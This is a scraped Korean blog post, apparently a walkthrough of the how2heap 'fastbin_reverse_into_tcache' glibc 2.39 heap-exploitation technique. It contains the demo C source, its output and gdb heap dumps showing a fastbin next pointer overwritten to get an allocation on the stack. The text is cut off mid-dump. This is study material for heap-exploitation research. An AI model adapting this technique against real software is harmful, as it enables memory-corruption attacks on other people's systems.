(fastbin_dup_into_stack \uae30\ubc95\uacfc \uc720\uc0ac<\/strong>)<\/p>\n\n\n\n
1. 0x40 \ud06c\uae30\uc758 \uba54\ubaa8\ub9ac\ub97c 14\ubc88 \ud560\ub2f9\ud558\uace0, \ucc98\uc74c \uae30\uc900 7\uac1c\uc758 tcache\ub4e4 \ud560\ub2f9\uc744 \ub2e4\uc2dc \ud574\uc81c\ud568.<\/strong><\/p>\n\n\n\n 2. ptrs[7]\uc5d0 \ud560\ub2f9\ub41c \uba54\ubaa8\ub9ac\ub97c \ud574\uc81c\ud568. \uc5ec\uae30\uc11c ptrs[7]\uc774 \uc190\uc0c1\uc2dc\ud0ac \uccad\ud06c\uc784.<\/strong><\/p>\n\n\n\n 3. \ub098\uba38\uc9c0 ptrs[8]~ptrs[13] \uba54\ubaa8\ub9ac\ub4e4\ub3c4 \ud560\ub2f9 \ud574\uc81c\ud568.<\/strong><\/p>\n\n\n\n 4. \ub530\ub77c\uc11c \ud560\ub2f9\ud574\uc81c\ub418\uc5c8\ub358 victim(= ptrs[7]) \uccad\ud06c\uc5d0 5. ptrs[0]~ptrs[6]\uae4c\uc9c0 malloc(0x40)\uc5d0 \uc758\ud574 \ud560\ub2f9\ubc1b\uc74c. \uc5ec\uae30\uc11c\ub294 tache\ub97c \ube44\uc6b0\uae30 \uc704\ud574 7\ubc88 \ud560\ub2f9\uc2dc\ucf30\uc74c..<\/strong><\/p>\n\n\n\n 6. \uc774\uc81c \ud55c\ubc88 7. \ud55c\ubc88 \ub354 0x40 \ud06c\uae30\uc758 \uba54\ubaa8\ub9ac\ub97c 14\ubc88 \ud560\ub2f9\ud568.<\/p>\n\n\n\n 7\uac1c\uc758 tcache\ub4e4\uc774 \ucc44\uc6cc\uc9c0\uace0, \ub098\uba38\uc9c0 7\uac1c\uc758 fastbin\ub4e4\uc774 \ud560\ub2f9\ub428. tcache\ub4e4\uc740 \uc0ac\uc6a9\ud558\uc9c0 \uc54a\uae30 \ub54c\ubb38\uc5d0 \ucc98\uc74c \uae30\uc900 7\uac1c\uc758 tcache\ub4e4 \ud560\ub2f9\uc744 \ub2e4\uc2dc \ud574\uc81c\ud568.<\/strong><\/p>\n\n\n\n \uc989 ptrs[7] ~ ptrs[13]\uae4c\uc9c0 7\uac1c\uac00 0x50\ud06c\uae30\ub9cc\ud07c \uccad\ud06c\ub4e4\uc774 fastbin\uc5d0 \ud560\ub2f9\ub428.<\/strong><\/p>\n\n\n\n \ucd9c \ubc88\uc5ed\ub0b4\uc6a9.<\/p>\n\n\n\n \uc774 \uacf5\uaca9\uc740 \ub2e4\uc74c \ud328\uce58 \uc774\ud6c4: https:\/\/sourceware.org\/git\/?p=glibc.git;a=commitdiff;h=a1a486d70ebcc47a686ff5846875eacad0940e41<\/a> \uc774 \uacf5\uaca9\uc744 \uc218\ud589\ud558\ub824\uba74 \ud799 \uc8fc\uc18c leak\uc774 \ud544\uc694\ud569\ub2c8\ub2e4. \uac19\uc740 \ud328\uce58\ub294 \ub610\ud55c \uba3c\uc800 tcache\ub97c \ucc44\uc6b0\uae30 \uc704\ud574 (7\ubc88\ubcf4\ub2e4 \ub9ce\uc774 \ud638\ucd9c\ud574\ub3c4 \uad1c\ucc2e\uc2b5\ub2c8\ub2e4.)<\/p>\n\n\n\n \ucf54\ub4dc:<\/p>\n\n\n\n \uacb0\uacfc:<\/p>\n\n\n\n ptrs[7]\uc5d0 \ud560\ub2f9\ub41c \uba54\ubaa8\ub9ac\ub97c \ud574\uc81c\ud568. <\/strong> \ucd9c\ub825 \ubc88\uc5ed\ub0b4\uc6a9.<\/p>\n\n\n\n \ub2e4\uc74c\uc73c\ub85c \uc9c0\uae08 \uc190\uc0c1\uc2dc\ud0a4\ub4e0 \ub098\uc911\uc5d0 \uc190\uc0c1\uc2dc\ud0a4\ub4e0 \uc0c1\uad00\uc5c6\uc2b5\ub2c8\ub2e4.<\/p>\n\n\n\n \uacb0\uacfc:<\/p>\n\n\n\n \ub098\uba38\uc9c0 ptrs[8]~ptrs[13] \uba54\ubaa8\ub9ac\ub4e4\ub3c4 \ud560\ub2f9 \ud574\uc81c\ud568.<\/strong><\/p>\n\n\n\n \ucd9c\ub825\ubc88\uc5ed \ub0b4\uc6a9.<\/p>\n\n\n\n \ub2e4\uc74c\uc73c\ub85c 1\uac1c\uc5d0\uc11c 6\uac1c \uc0ac\uc774\uc758 \ud3ec\uc778\ud130\ub97c \ub354 \ub9cc\uc57d \uc6b0\ub9ac\uac00 \ub36e\uc5b4\uc4f0\ub824\ub294 \uc2a4\ud0dd \uc8fc\uc18c\uc758 \uac12\uc774 0\uc774 \uc544\ub2c8\ub77c\uba74, \uc815\ud655\ud788 6\uac1c\uc758 \ud3ec\uc778\ud130\ub97c \uadf8\ub807\uc9c0 \uc54a\uc73c\uba74 \uacf5\uaca9\uc774 segmentation fault\ub97c \uc77c\uc73c\ud0b5\ub2c8\ub2e4.<\/p>\n\n\n\n \ud558\uc9c0\ub9cc \uc2a4\ud0dd\uc5d0 \uc788\ub294 \uac12\uc774 0\uc774\ub77c\uba74, \ud3ec\uc778\ud130 \ud558\ub098\ub9cc \ucf54\ub4dc:<\/p>\n\n\n\n \uacb0\uacfc:<\/p>\n\n\n\n \ud0c0\uac9f\uc73c\ub85c, \ud799 \ud560\ub2f9\uc744 \ud1b5\ud574 \ubc1b\uc73c\ub824\ub294 \uc2a4\ud0dd \uc8fc\uc18c\ub294 \ucd9c\ub825\ubc88\uc5ed \ub0b4\uc6a9.<\/p>\n\n\n\n \uc6b0\ub9ac\uac00 \ud0c0\uac9f\uc73c\ub85c \uc0bc\uc73c\ub824\ub294 \uc2a4\ud0dd \uc8fc\uc18c: \ucf54\ub4dc:<\/p>\n\n\n\n \uacb0\uacfc:<\/p>\n\n\n\n \ud560\ub2f9\ud574\uc81c\ub418\uc5c8\ub358 victim(\uc774\ud558 ptrs[7]) \uccad\ud06c\uc5d0<\/strong> \uc8fc\uc11d \ubc88\uc5ed\ub0b4\uc6a9:<\/p>\n\n\n\n victim\uc758 \uc5f0\uacb0 \ub9ac\uc2a4\ud2b8 \ud3ec\uc778\ud130\ub97c \ub36e\uc5b4\uc501\ub2c8\ub2e4. \ucf54\ub4dc:<\/p>\n\n\n\n \uacb0\uacfc:<\/p>\n\n\n\n ptrs[0]~ptrs[6]\uae4c\uc9c0 malloc(0x40)\uc5d0 \uc758\ud574 \ud560\ub2f9\ubc1b\uc74c.<\/strong><\/p>\n\n\n\n tache\ub97c \ube44\uc6b0\uae30 \uc704\ud574 7\ubc88 \ud560\ub2f9\uc2dc\ud0b4.<\/strong><\/p>\n\n\n\n \ucf54\ub4dc:<\/p>\n\n\n\n \uacb0\uacfc:<\/p>\n\n\n\n stack_var[0] ~ stack_var[6]\uae4c\uc9c0 \uc2a4\ud0dd\uc5d0 \uc788\ub294 \uac12\uc744 \ucd9c\ub825\ud574\uc90c.<\/strong><\/p>\n\n\n\n \ucd9c\ub825 \ubc88\uc5ed\ub0b4\uc6a9:<\/p>\n\n\n\n \uc774\uc81c \uc2a4\ud0dd\uc5d0 \uc788\ub294 \ubc30\uc5f4\uc758 \ub0b4\uc6a9\uc744 \ucd9c\ub825\ud574 \ubd05\uc2dc\ub2e4. \ucf54\ub4dc:<\/p>\n\n\n\n \uacb0\uacfc:<\/p>\n\n\n\n \uc774\uc81c \ud55c\ubc88 \ucd9c\ub825 \ubc88\uc5ed \ub0b4\uc6a9:<\/p>\n\n\n\n \ub2e4\uc74c \ud560\ub2f9\uc5d0\uc11c \uc2a4\ud0dd\uc774 \ub36e\uc5b4\uc4f0\uae30\ub429\ub2c8\ub2e4. \uc774 7\uac1c\uc758 \uccad\ud06c\ub294 \uc5ed\uc21c\uc73c\ub85c \uc774 \uccad\ud06c\ub294 \ub9ac\uc2a4\ud2b8\uc5d0\uc11c \ub2e4\uc74c \uccad\ud06c\ub97c \uac00\ub9ac\ud0a4\ub294 \ud3ec\uc778\ud130\ub97c \ud3ec\ud568\ud558\uace0 \uc788\uae30 \ub54c\ubb38\uc5d0, \uc55e\uc11c \uc6b0\ub9ac\ub294 \uc65c\ub0d0\ud558\uba74 \uc2a4\ud0dd\uc5d0 \uc788\ub294 \uac12\uc774 \uc5f0\uacb0 \ub9ac\uc2a4\ud2b8\uc758 next \ud3ec\uc778\ud130\ub85c \ucc98\ub9ac\ub418\uae30 \ub54c\ubb38\uc5d0, \uc774\uc81c \uc2a4\ud0dd\uc5d0 \uc788\ub294 \ubc30\uc5f4\uc758 \ub0b4\uc6a9\uc740 \ub2e4\uc74c\uacfc \uac19\uc2b5\ub2c8\ub2e4:<\/p>\n\n\n\n \ucf54\ub4dc:<\/p>\n\n\n\n \uacb0\uacfc:<\/p>\n\n\n\n \ub9c8\uc9c0\ub9c9\uc73c\ub85c \ub531 \ud55c\ubc88\ub354 \ucf54\ub4dc:<\/p>\n\n\n\n \uacb0\uacfc:<\/p>\n\n\n\n \ud658\uacbd Ubuntu GLIBC 2.39-0ubuntu8.4 \/ Ubuntu 24.04.1 LTS x86_64 \uc694\uc57d fastbin\uc73c\ub85c malloc\ud560\ub54c \uc9c0\uc5ed\ubcc0\uc218 \uc2a4\ud0dd \uc8fc\uc18c\ub85c \ud560\ub2f9\ubc1b\ub294 \ubc29\ubc95\uc5d0 \uc124\uba85\ud55c\ub2e4. (fastbin_dup_into_stack \uae30\ubc95\uacfc \uc720\uc0ac) 1. 0x40 \ud06c\uae30\uc758 \uba54\ubaa8\ub9ac\ub97c 14\ubc88 \ud560\ub2f9\ud558\uace0, \ucc98\uc74c \uae30\uc900 7\uac1c\uc758 tcache\ub4e4 \ud560\ub2f9\uc744 \ub2e4\uc2dc \ud574\uc81c\ud568. 2. ptrs[7]\uc5d0 \ud560\ub2f9\ub41c \uba54\ubaa8\ub9ac\ub97c \ud574\uc81c\ud568. \uc5ec\uae30\uc11c ptrs[7]\uc774 \uc190\uc0c1\uc2dc\ud0ac \uccad\ud06c\uc784. 3. \ub098\uba38\uc9c0 ptrs[8]~ptrs[13] \uba54\ubaa8\ub9ac\ub4e4\ub3c4 \ud560\ub2f9 \ud574\uc81c\ud568. 4. size_t stack_var[6]; \uc9c0\uc5ed\ubcc0\uc218 \uc8fc\uc18c\ub294 0x7fffffffdfc0\uc784.… \ub354 \ubcf4\uae30 »[how2heap\/glibc2.39] fastbin_reverse_into_tcache<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","footnotes":""},"categories":[52],"tags":[53,35,51,25],"class_list":["post-3580","post","type-post","status-publish","format-standard","hentry","category-how2heap","tag-fastbin","tag-heap","tag-how2heap","tag-pwnable"],"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3580","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3580"}],"version-history":[{"count":14,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3580\/revisions"}],"predecessor-version":[{"id":3613,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3580\/revisions\/3613"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3580"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3580"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3580"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}size_t stack_var[6];<\/code> \uc9c0\uc5ed\ubcc0\uc218 \uc8fc\uc18c\ub294 0x7fffffffdfc0<\/code>\uc784. \ud574\ub2f9 \uc9c0\uc5ed\ubcc0\uc218 \uac12\ub4e4\uc740 \uc804\ubd80 \uc784\uc758 \uac12\uc778 0xcdcdcdcdcdcdcdcd<\/code> \ub85c \ucc44\uc6c0(\uad73\uc774 \uc548\ucc44\uc6cc\ub3c4 \ub420\ub4ef?), \ud799 \ud560\ub2f9\uc744 \ud1b5\ud574 \ubc1b\uc73c\ub824\ub294 \uc2a4\ud0dd \uc8fc\uc18c\ub294 0x7fffffffdfd0,<\/code> \uc989 stack_var[2]<\/code>\uc784.<\/strong><\/p>\n\n\n\n(size_t stack_var[6]; \uc9c0\uc5ed\ubcc0\uc218 \uc8fc\uc18c ^ (victim >> 12))<\/code> \uc5f0\uc0b0\uacfc \ud568\uaed8 safe-linking \ubcf4\ud638\uae30\ubc95\uc774 \uc801\uc6a9\ub41c fd \uac12\uc73c\ub85c \ub36e\uc5b4\uc500.<\/strong><\/p>\n\n\n\nmalloc(0x40)<\/code>\ud558\uba74, stack_var[2] ~ [3]<\/code> \uac12\uc774 \ubcc0\uc870\ub418\uace0,<\/strong><\/p>\n\n\n\nmalloc(0x40)<\/code>\ud558\uba74, stack_var[2]<\/code> \uc778 \uc2a4\ud0dd \uc8fc\uc18c\ub85c \ud560\ub2f9\ubc1b\uc744 \uc218 \uc788\uc74c.<\/strong><\/p>\n\n\n\n\ube4c\ub4dc \ud2b9\uc774\uc0ac\ud56d<\/h3>\n\n\n\n
-Os<\/code> \uc635\uc158\uc73c\ub85c \ucef4\ud30c\uc77c\ud558\uba74 \uc548\ub428.<\/p>\n\n\n\ngcc -O0 -o fastbin_reverse_into_tcache fastbin_reverse_into_tcache.c<\/code><\/p>\n\n\n\n\ub0b4\uc6a9<\/h3>\n\n\n\n
1.<\/h3>\n\n\n\n
unsorted_bin_attack<\/code>\uacfc \uc720\uc0ac\ud55c \ud6a8\uacfc\ub97c \uac00\uc9c0\ub3c4\ub85d \uc124\uacc4\ub418\uc5c8\uc73c\uba70, \uc791\uc740 \ud560\ub2f9 \ud06c\uae30(allocsize <= 0x78<\/code>)\uc5d0\uc11c\ub3c4 \uc791\ub3d9\ud569\ub2c8\ub2e4. \ubaa9\ud45c\ub294 malloc(allocsize)<\/code> \ud638\ucd9c \uc2dc \uc2a4\ud0dd\uc5d0 \ud070 unsigned \uac12\uc744 \uc4f0\ub3c4\ub85d \uc124\uc815\ud558\ub294 \uac83\uc785\ub2c8\ub2e4.<\/p>\n\n\n\ntcache<\/code>\uc5d0\uc11c \ubc18\ud658\ub418\ub294 \uccad\ud06c\uac00 \uc62c\ubc14\ub974\uac8c \uc815\ub82c\ub418\ub3c4\ub85d \ubcf4\uc7a5\ud569\ub2c8\ub2e4.<\/p>\n\n\n\nfree(allocsize)<\/code>\ub97c \ucd5c\uc18c 7\ubc88 \ud638\ucd9c\ud574\uc57c \ud569\ub2c8\ub2e4.<\/p>\n\n\n\nconst size_t allocsize = 0x40;\n\nint main(){\n\tsetbuf(stdout, NULL);\n\n\tprintf(\"\\n\"\n\t\t \"This attack is intended to have a similar effect to the unsorted_bin_attack,\\n\"\n\t\t \"except it works with a small allocation size (allocsize <= 0x78).\\n\"\n\t\t \"The goal is to set things up so that a call to malloc(allocsize) will write\\n\"\n\t\t \"a large unsigned value to the stack.\\n\\n\");\n\tprintf(\"After the patch https:\/\/sourceware.org\/git\/?p=glibc.git;a=commitdiff;h=a1a486d70ebcc47a686ff5846875eacad0940e41,\\n\"\n\t\t \"An heap address leak is needed to perform this attack.\\n\"\n\t\t \"The same patch also ensures the chunk returned by tcache is properly aligned.\\n\\n\");\n\n\t\/\/ Allocate 14 times so that we can free later.\n\tchar* ptrs[14];\n\tsize_t i;\n\tfor (i = 0; i < 14; i++) {\n\t\tptrs[i] = malloc(allocsize);\n\t}\n\t\n\tprintf(\"First we need to free(allocsize) at least 7 times to fill the tcache.\\n\"\n\t \t \"(More than 7 times works fine too.)\\n\\n\");\n\t\n\t\/\/ Fill the tcache.\n\tfor (i = 0; i < 7; i++) free(ptrs[i]);<\/pre>\n\n\n\nThis attack is intended to have a similar effect to the unsorted_bin_attack,\nexcept it works with a small allocation size (allocsize <= 0x78).\nThe goal is to set things up so that a call to malloc(allocsize) will write\na large unsigned value to the stack.\n\nAfter the patch https:\/\/sourceware.org\/git\/?p=glibc.git;a=commitdiff;h=a1a486d70ebcc47a686ff5846875eacad0940e41,\nAn heap address leak is needed to perform this attack.\nThe same patch also ensures the chunk returned by tcache is properly aligned.\n\nFirst we need to free(allocsize) at least 7 times to fill the tcache.\n(More than 7 times works fine too.)<\/pre>\n\n\n\n
gdb-peda$ parseheap\naddr prev size status fd bk \n0x555555559000 0x0 0x290 Used None None\n0x555555559290 0x0 0x50 Freed 0x555555559 None\n0x5555555592e0 0x0 0x50 Freed 0x55500000c7f9 None\n0x555555559330 0x0 0x50 Freed 0x55500000c7a9 None\n0x555555559380 0x0 0x50 Freed 0x55500000c619 None\n0x5555555593d0 0x0 0x50 Freed 0x55500000c6c9 None\n0x555555559420 0x0 0x50 Freed 0x55500000c6b9 None\n0x555555559470 0x0 0x50 Freed 0x55500000c169 None\n0x5555555594c0 0x0 0x50 Used None None\n0x555555559510 0x0 0x50 Used None None\n0x555555559560 0x0 0x50 Used None None\n0x5555555595b0 0x0 0x50 Used None None\n0x555555559600 0x0 0x50 Used None None\n0x555555559650 0x0 0x50 Used None None\n0x5555555596a0 0x0 0x50 Used None None\ngdb-peda$ heapinfo\n(0x20) fastbin[0]: 0x0\n(0x30) fastbin[1]: 0x0\n(0x40) fastbin[2]: 0x0\n(0x50) fastbin[3]: 0x0\n(0x60) fastbin[4]: 0x0\n(0x70) fastbin[5]: 0x0\n(0x80) fastbin[6]: 0x0\n(0x90) fastbin[7]: 0x0\n(0xa0) fastbin[8]: 0x0\n(0xb0) fastbin[9]: 0x0\n top: 0x5555555596f0 (size : 0x20910)\n last_remainder: 0x0 (size : 0x0)\n unsortbin: 0x0\n(0x50) tcache_entry[3](7): 0x555555559480 --> 0x555555559430 --> 0x5555555593e0 --> 0x555555559390 --> 0x555555559340 --> 0x5555555592f0 --> 0x5555555592a0\ngdb-peda$<\/pre>\n\n\n\n
![\"\"](\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/\ud654\uba74-\ucea1\ucc98-2025-05-13-000637.png\")
<\/figure>\n\n\n\n2.<\/h3>\n\n\n\n
ptrs[7]\uc740 \uc6b0\ub9ac\uac00 \uc190\uc0c1\uc2dc\ud0ac \uccad\ud06c\uc784 \u3147\u3147<\/strong><\/p>\n\n\n\nfree<\/code>\ud560 \ud3ec\uc778\ud130\ub294 \uc6b0\ub9ac\uac00 \uc190\uc0c1\uc2dc\ud0ac \uccad\ud06c\uc785\ub2c8\ub2e4: 0x5555555594d0<\/code><\/strong><\/p>\n\n\n\ntcache<\/code>\uac00 \uc774\ubbf8 \uac00\ub4dd \ucc3c\uae30 \ub54c\ubb38\uc5d0 \uc774 \uccad\ud06c\ub294 fastbin<\/code>\uc5d0 \ub4e4\uc5b4\uac00\uac8c \ub429\ub2c8\ub2e4.<\/p>\n\n\n\nchar* victim = ptrs[7];\n\tprintf(\"The next pointer that we free is the chunk that we're going to corrupt: %p\\n\"\n\t\t \"It doesn't matter if we corrupt it now or later. Because the tcache is\\n\"\n\t\t \"already full, it will go in the fastbin.\\n\\n\", victim);\n\tfree(victim);<\/pre>\n\n\n\n
The next pointer that we free is the chunk that we're going to corrupt: 0x5555555594d0\nIt doesn't matter if we corrupt it now or later. Because the tcache is\nalready full, it will go in the fastbin.<\/pre>\n\n\n\n
gdb-peda$ parseheap\naddr prev size status fd bk \n0x555555559000 0x0 0x290 Used None None\n0x555555559290 0x0 0x50 Freed 0x555555559 None\n0x5555555592e0 0x0 0x50 Freed 0x55500000c7f9 None\n0x555555559330 0x0 0x50 Freed 0x55500000c7a9 None\n0x555555559380 0x0 0x50 Freed 0x55500000c619 None\n0x5555555593d0 0x0 0x50 Freed 0x55500000c6c9 None\n0x555555559420 0x0 0x50 Freed 0x55500000c6b9 None\n0x555555559470 0x0 0x50 Freed 0x55500000c169 None\n0x5555555594c0 0x0 0x50 Freed 0x555555559 None\n0x555555559510 0x0 0x50 Used None None\n0x555555559560 0x0 0x50 Used None None\n0x5555555595b0 0x0 0x50 Used None None\n0x555555559600 0x0 0x50 Used None None\n0x555555559650 0x0 0x50 Used None None\n0x5555555596a0 0x0 0x50 Used None None\ngdb-peda$ heapinfo\n(0x20) fastbin[0]: 0x0\n(0x30) fastbin[1]: 0x0\n(0x40) fastbin[2]: 0x0\n(0x50) fastbin[3]: 0x5555555594c0 --> 0x0\n(0x60) fastbin[4]: 0x0\n(0x70) fastbin[5]: 0x0\n(0x80) fastbin[6]: 0x0\n(0x90) fastbin[7]: 0x0\n(0xa0) fastbin[8]: 0x0\n(0xb0) fastbin[9]: 0x0\n top: 0x5555555596f0 (size : 0x20910)\n last_remainder: 0x0 (size : 0x0)\n unsortbin: 0x0\n(0x50) tcache_entry[3](7): 0x555555559480 --> 0x555555559430 --> 0x5555555593e0 --> 0x555555559390 --> 0x555555559340 --> 0x5555555592f0 --> 0x5555555592a0<\/pre>\n\n\n\n
![\"\"](\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-32.png\")
<\/figure>\n\n\n\n3.<\/h3>\n\n\n\n
free<\/code>\ud574\uc57c \ud569\ub2c8\ub2e4. \uc774\ub4e4 \uc5ed\uc2dc fastbin<\/code>\uc5d0 \ub4e4\uc5b4\uac00\uac8c \ub429\ub2c8\ub2e4.<\/p>\n\n\n\nfree<\/code>\ud574\uc57c \ud569\ub2c8\ub2e4.<\/p>\n\n\n\nfree<\/code>\ud574\ub3c4 \ucda9\ubd84\ud569\ub2c8\ub2e4.<\/p>\n\n\n\n\tprintf(\"Next we need to free between 1 and 6 more pointers. These will also go\\n\"\n\t\t \"in the fastbin. If the stack address that we want to overwrite is not zero\\n\"\n\t\t \"then we need to free exactly 6 more pointers, otherwise the attack will\\n\"\n\t\t \"cause a segmentation fault. But if the value on the stack is zero then\\n\"\n\t\t \"a single free is sufficient.\\n\\n\");\n\t\n\t\/\/ Fill the fastbin.\n\tfor (i = 8; i < 14; i++) free(ptrs[i]);<\/pre>\n\n\n\n
Next we need to free between 1 and 6 more pointers. These will also go\nin the fastbin. If the stack address that we want to overwrite is not zero\nthen we need to free exactly 6 more pointers, otherwise the attack will\ncause a segmentation fault. But if the value on the stack is zero then\na single free is sufficient.<\/pre>\n\n\n\n
gdb-peda$ parseheap\naddr prev size status fd bk \n0x555555559000 0x0 0x290 Used None None\n0x555555559290 0x0 0x50 Freed 0x555555559 None\n0x5555555592e0 0x0 0x50 Freed 0x55500000c7f9 None\n0x555555559330 0x0 0x50 Freed 0x55500000c7a9 None\n0x555555559380 0x0 0x50 Freed 0x55500000c619 None\n0x5555555593d0 0x0 0x50 Freed 0x55500000c6c9 None\n0x555555559420 0x0 0x50 Freed 0x55500000c6b9 None\n0x555555559470 0x0 0x50 Freed 0x55500000c169 None\n0x5555555594c0 0x0 0x50 Freed 0x555555559 None\n0x555555559510 0x0 0x50 Freed 0x55500000c199 None\n0x555555559560 0x0 0x50 Freed 0x55500000c049 None\n0x5555555595b0 0x0 0x50 Freed 0x55500000c039 None\n0x555555559600 0x0 0x50 Freed 0x55500000c0e9 None\n0x555555559650 0x0 0x50 Freed 0x55500000c359 None\n0x5555555596a0 0x0 0x50 Freed 0x55500000c309 None\ngdb-peda$ heapinfo\n(0x20) fastbin[0]: 0x0\n(0x30) fastbin[1]: 0x0\n(0x40) fastbin[2]: 0x0\n(0x50) fastbin[3]: 0x5555555596a0 --> 0x555555559650 --> 0x555555559600 --> 0x5555555595b0 --> 0x555555559560 --> 0x555555559510 --> 0x5555555594c0 --> 0x0\n(0x60) fastbin[4]: 0x0\n(0x70) fastbin[5]: 0x0\n(0x80) fastbin[6]: 0x0\n(0x90) fastbin[7]: 0x0\n(0xa0) fastbin[8]: 0x0\n(0xb0) fastbin[9]: 0x0\n top: 0x5555555596f0 (size : 0x20910)\n last_remainder: 0x0 (size : 0x0)\n unsortbin: 0x0\n(0x50) tcache_entry[3](7): 0x555555559480 --> 0x555555559430 --> 0x5555555593e0 --> 0x555555559390 --> 0x555555559340 --> 0x5555555592f0 --> 0x5555555592a0\ngdb-peda$<\/pre>\n\n\n\n
![\"\"](\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-33-1024x652.png\")
<\/figure>\n\n\n\n4.<\/h3>\n\n\n\n
size_t stack_var[6];<\/code> \uc9c0\uc5ed\ubcc0\uc218 \uc8fc\uc18c\ub294 0x7fffffffdfc0<\/code>\uc784. <\/strong>
\ud574\ub2f9 \ub370\uc774\ud130\ub4e4\uc740 0xcdcdcdcdcdcdcdcd<\/code> \uac12\uc73c\ub85c \uc804\ubd80 \ucc44\uc6cc\uc9d0. <\/strong>
\uc5ec\uae30\uc11c size_t\ub294 8\ubc14\uc774\ud2b8. 8*6 = 48 = 0x30 = sizeof(stack_var)<\/code><\/strong><\/p>\n\n\n\n0x7fffffffdfd0. <\/code><\/strong>(0x7fffffffdfc0 + 0x10 = 0x7fffffffdfd0)<\/code><\/strong><\/p>\n\n\n\n0x7fffffffdfd0<\/code><\/strong>
\ud604\uc7ac \uc774 \uc8fc\uc18c\uc758 \uac12\uc740 0xcdcdcdcdcdcdcdcd<\/strong><\/code>\uc785\ub2c8\ub2e4.
\uc774\uc81c \ubc84\ud37c \uc624\ubc84\ud50c\ub85c\uc6b0\ub098 use-after-free \uac19\uc740 \ucde8\uc57d\uc810\uc744 \uc774\uc6a9\ud574 \uc8fc\uc18c 0x5555555594d0<\/strong><\/code>\uc5d0 \uc788\ub294 next \ud3ec\uc778\ud130\ub97c \ub36e\uc5b4\uc501\ub2c8\ub2e4.<\/p>\n\n\n\n\t\/\/ Create an array on the stack and initialize it with garbage.\n\tsize_t stack_var[6];\n\tmemset(stack_var, 0xcd, sizeof(stack_var));\n\t\n\tprintf(\"The stack address that we intend to target: %p\\n\"\n\t\t \"It's current value is %p\\n\", &stack_var[2], (char*)stack_var[2]);\n\t\n\tprintf(\"Now we use a vulnerability such as a buffer overflow or a use-after-free\\n\"\n\t\t\t\"to overwrite the next pointer at address %p\\n\\n\", victim);<\/pre>\n\n\n\n
The stack address that we intend to target: 0x7fffffffdfd0\nIt's current value is 0xcdcdcdcdcdcdcdcd\nNow we use a vulnerability such as a buffer overflow or a use-after-free\nto overwrite the next pointer at address 0x5555555594d0<\/pre>\n\n\n\n
gdb-peda$ x\/7gx 0x7fffffffdfc0\n0x7fffffffdfc0: 0xcdcdcdcdcdcdcdcd 0xcdcdcdcdcdcdcdcd\n0x7fffffffdfd0: 0xcdcdcdcdcdcdcdcd 0xcdcdcdcdcdcdcdcd\n0x7fffffffdfe0: 0xcdcdcdcdcdcdcdcd 0xcdcdcdcdcdcdcdcd\n0x7fffffffdff0: 0x00005555555592a0<\/pre>\n\n\n\n
5.<\/h3>\n\n\n\n
(size_t stack_var[6]; \uc9c0\uc5ed\ubcc0\uc218 \uc8fc\uc18c ^ (victim >> 12))<\/code> \uc5f0\uc0b0\uacfc \ud568\uaed8 <\/strong>
safe-linking \ubcf4\ud638\uae30\ubc95\uc774 \uc801\uc6a9\ub41c fd \uac12\uc73c\ub85c \ub36e\uc5b4\uc500.<\/strong><\/p>\n\n\n\n(0x7fffffffdfc0 ^ (0x5555555594d0 >> 12)) = 0x7ffaaaaa8a99<\/code><\/strong><\/p>\n\n\n\n
\ub2e4\uc74c \uc791\uc5c5\uc740 victim\uc758 \uc8fc\uc18c\ub97c \uc54c\uace0 \uc788\ub2e4\ub294 \uc804\uc81c\ud558\uc5d0 \uc774\ub8e8\uc5b4\uc9c0\ubbc0\ub85c, \ud799 \uc8fc\uc18c leak\uc774 \ud544\uc694\ud569\ub2c8\ub2e4.<\/p>\n\n\n\n\/\/------------VULNERABILITY-----------\n\t\n\t\/\/ Overwrite linked list pointer in victim.\n\t\/\/ The following operation assumes the address of victim is known, thus requiring\n\t\/\/ a heap leak.\n\t*(size_t**)victim = (size_t*)((long)&stack_var[0] ^ ((long)victim >> 12));\n\t\n\t\/\/------------------------------------<\/pre>\n\n\n\n
gdb-peda$ parseheap\naddr prev size status fd bk \n0x555555559000 0x0 0x290 Used None None\n0x555555559290 0x0 0x50 Freed 0x555555559 None\n0x5555555592e0 0x0 0x50 Freed 0x55500000c7f9 None\n0x555555559330 0x0 0x50 Freed 0x55500000c7a9 None\n0x555555559380 0x0 0x50 Freed 0x55500000c619 None\n0x5555555593d0 0x0 0x50 Freed 0x55500000c6c9 None\n0x555555559420 0x0 0x50 Freed 0x55500000c6b9 None\n0x555555559470 0x0 0x50 Freed 0x55500000c169 None\n0x5555555594c0 0x0 0x50 Freed 0x7ffaaaaa8a99 None\n0x555555559510 0x0 0x50 Freed 0x55500000c199 None\n0x555555559560 0x0 0x50 Freed 0x55500000c049 None\n0x5555555595b0 0x0 0x50 Freed 0x55500000c039 None\n0x555555559600 0x0 0x50 Freed 0x55500000c0e9 None\n0x555555559650 0x0 0x50 Freed 0x55500000c359 None\n0x5555555596a0 0x0 0x50 Freed 